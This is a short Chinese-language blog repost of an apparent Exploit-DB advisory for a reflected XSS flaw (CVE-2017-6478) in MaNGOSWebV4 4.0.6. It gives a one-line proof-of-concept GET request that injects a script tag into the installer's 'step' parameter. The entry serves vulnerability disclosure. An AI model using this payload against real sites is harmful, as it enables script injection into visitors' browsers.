MaNGOSWebV4 4.0.6 反射型XSS漏洞技术分析

本文详细分析了MaNGOSWebV4 4.0.6版本中存在的反射型跨站脚本(XSS)安全漏洞(CVE-2017-6478),提供了概念验证(PoC)攻击代码,并说明了该漏洞的影响范围与测试环境。

Exploit Title: MaNGOSWebV4 4.0.6 - 反射型XSS

  • EDB-ID: 52457
  • CVE: 2017-6478
  • EDB Verified: 已验证
  • 作者: CodeSecLab
  • 类型: webapps
  • 平台: 多平台
  • 日期: 2025-12-03

漏洞应用程序:

# 漏洞标题: MaNGOSWebV4 4.0.6 - 反射型XSS # 日期: 2024-10-26 # 漏洞作者: CodeSecLab # 供应商主页: https://github.com/paintballrefjosh/MaNGOSWebV4 # 软件链接: https://github.com/paintballrefjosh/MaNGOSWebV4 # 版本: 4.0.6 # 测试平台: Ubuntu, Windows # CVE: CVE-2017-6478

概念验证 (PoC):

1
2

// 访问易受攻击的URL并触发XSS载荷
GET http://mangoswebv4/install/index.php?step=%3Cscript%3Ealert(1)%3C/script%3E

【请替换为您的域名】

标签:

  • 跨站脚本 (XSS)

建议/来源:

  • 链接
comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次